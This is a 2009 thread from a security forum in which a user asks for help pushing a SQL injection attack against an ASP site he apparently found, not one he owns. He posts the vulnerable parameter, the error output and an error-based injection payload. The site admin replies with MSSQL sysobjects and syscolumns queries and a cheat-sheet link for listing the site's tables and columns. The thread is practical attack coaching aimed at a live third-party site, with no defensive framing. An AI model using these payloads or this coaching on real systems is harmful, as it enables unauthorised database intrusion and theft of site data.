|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 59
Members: 0
Total: 59
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Help me in sql inject with asp |
|
Posted: Sun Mar 08, 2009 11:40 pm |
|
|
ukzz |
Regular user |
|
|
Joined: Feb 05, 2009 |
Posts: 22 |
|
|
|
|
|
|
|
I got a site with sql error
producr.asp?cat=a'
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string 'a' and active=1'.
/product.asp, line 82
I can get data name , username , server name
But when i try to get table name i see this error
product.asp?cat=a' and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
======
error '80020009'
/product.asp, line 83
=============
any one can help me in this case? |
|
|
|
|
|
|
|
|
Posted: Mon Mar 09, 2009 6:24 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Probably you have MSSQL2000 or similar database here, not MySql. So forget about information_schema and instead use sysobjects and other MSSQL features:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Code: |
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
|
But first use @@version to get extact sql server version. |
|
|
|
|
Posted: Sun Mar 15, 2009 8:11 pm |
|
|
ukzz |
Regular user |
|
|
Joined: Feb 05, 2009 |
Posts: 22 |
|
|
|
|
|
|
|
thanks admin for help me. It's very useful |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|